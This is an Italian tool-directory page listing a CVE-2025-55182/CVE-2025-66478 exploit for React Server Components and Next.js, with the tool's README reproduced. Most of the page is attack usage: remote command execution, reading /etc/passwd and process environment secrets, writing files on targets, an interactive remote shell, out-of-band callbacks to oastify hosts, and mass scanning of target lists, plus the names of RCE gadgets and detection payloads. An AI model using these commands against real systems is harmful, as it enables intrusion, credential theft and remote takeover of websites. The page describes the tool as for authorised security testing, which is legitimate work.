Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — Strumento di exploit per CVE-2025-55182 e CVE-2025-66478 in React Server Components e Next.js, con gadget RCE, lettura/scrittura file, callback OOB e shell interattiva per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Scanner di VulnerabilitàAnalisi Dinamica (Sandboxing)ExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingCommand and ControlApprendimento e Formazione
Red Teaming
Sviluppo Payload
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Strumento di exploit per CVE-2025-55182 e CVE-2025-66478 in React Server Components e Next.js, con gadget RCE, lettura/scrittura file, callback OOB e shell interattiva per test di sicurezza autorizzati.

Vedi Repository
21129 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - Exploit RCE per React Server Components v2.0

Uno strumento completo di ricerca sulla sicurezza per testare le vulnerabilità CVE-2025-55182 e CVE-2025-66478 in React Server Components (RSC) e Next.js Server Actions.

Panoramica della vulnerabilità

ProprietàValore
ID CVECVE-2025-55182, CVE-2025-66478
Punteggio CVSS10.0 (CRITICO)
Versioni interessateReact < 19.2.0, Next.js < 15.0.5
Tipo di vulnerabilitàEsecuzione remota di codice (RCE)
Vettore di attaccoRete

Funzionalità

  • Scansione delle vulnerabilità in stile PortSwigger con molteplici payload di rilevamento
  • Molteplici gadget RCE (execSync, spawnSync, vm.runInThisContext, ecc.)
  • Test dei callback Out-of-Band (OOB) per la verifica di RCE cieca
  • Capacità di lettura/scrittura di file
  • Esecuzione di codice JavaScript
  • Modalità shell interattiva
  • Scansione di massa con multi-threading
  • Supporto proxy (compatibile con Burp Suite)
  • Formati di output JSON/Testo

Installazione

Requisiti

pip install requests

Versione Python

  • Python 3.7 o superiore

Avvio rapido

# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan

# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Interactive shell
python3 exploit-custom.py -u https://target.com --shell

Utilizzo

Argomenti della riga di comando

usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Selezione del target

ArgomentoDescrizioneEsempio
-u, --urlURL del singolo target-u https://target.com
-l, --listFile contenente gli URL-l targets.txt

Modalità di scansione

ArgomentoDescrizione
--detectRileva l'uso di Next.js/RSC
--checkVerifica rapida della vulnerabilità (test matematico)
--scanScansione completa della vulnerabilità (stile PortSwigger)
--test-allTesta tutti i gadget e i payload di rilevamento

Sfruttamento

ArgomentoDescrizioneEsempio
--cmdEsegue un comando shell--cmd "id"
--gadgetSpecifica il gadget da utilizzare--gadget execSync
--readLegge un file dal target--read /etc/passwd
--writeScrive un file sul target--write /tmp/test.txt "content"
--jsEsegue codice JavaScript--js "process.env"
--shellAvvia una shell interattiva--shell
--oobHost di callback OOB--oob xyz.oastify.com

Opzioni di connessione

ArgomentoDescrizioneEsempio
-p, --proxyProxy HTTP/HTTPS-p http://127.0.0.1:8080
-c, --cookiesStringa dei cookie-c "session=abc123"
-H, --headerHeader aggiuntivo (ripetibile)-H "X-Custom: value"
-t, --threadsNumero di thread per la scansione di massa-t 20
--timeoutTimeout della richiesta in secondi--timeout 60

Opzioni di output

ArgomentoDescrizione
-o, --outputSalva i risultati in un file (.json o .txt)
-q, --quietSopprime il banner

Esempi di scansione

Target singolo

# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect

# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan

# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Scansione di massa

# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json

# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Esempi di sfruttamento

Esecuzione di comandi

# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

Operazioni sui file

# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

Esecuzione di JavaScript

# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Shell interattiva

python3 exploit-custom.py -u https://target.com --shell

Comandi della shell:

ComandoDescrizione
<command>Esegue un comando shell
!read <file>Legge un file
!write <file> <content>Scrive un file
!js <code>Esegue JavaScript
!gadget <name>Cambia gadget
exitEsce dalla shell

Gadget disponibili

Gadget RCE

NomeID moduloDescrizione
execSyncchild_process#execSyncEsecuzione diretta di comandi shell
execFileSyncchild_process#execFileSyncEsegue un file binario
spawnSyncchild_process#spawnSyncAvvia un processo con argomenti
vm_runInThisContextvm#runInThisContextEsegue JS nel contesto corrente
vm_runInNewContextvm#runInNewContextEsegue JS con evasione dalla sandbox
vm_runInThisContext_globalvm#runInThisContextEsegue tramite global.process

Gadget per file

NomeID moduloDescrizione
fs_readFileSyncfs#readFileSyncLegge file arbitrari
fs_writeFileSyncfs#writeFileSyncScrive file arbitrari

Gadget OOB

NomeDescrizione
vm_fetchRichiesta HTTP tramite API fetch (Node 18+)
vm_httpRichiesta HTTP tramite modulo http

Payload di rilevamento (CVE-2025-66478)

La modalità --scan utilizza questi payload di rilevamento in stile PortSwigger:

PayloadDescrizione
property_referenceRiferimento di proprietà delimitato da due punti ["$1:a:a"]
property_reference_v2Riferimento alternativo ["$1:b:b"]
property_reference_constructorAccesso al costruttore tramite riferimento di proprietà
property_reference_protoAccesso alla catena proto tramite riferimento di proprietà
action_ref_vmACTION_REF con vm#runInThisContext
action_ref_execSyncACTION_REF con child_process#execSync

Metodi di callback OOB

Lo strumento supporta molteplici metodi di callback OOB:

Scarica lo strumento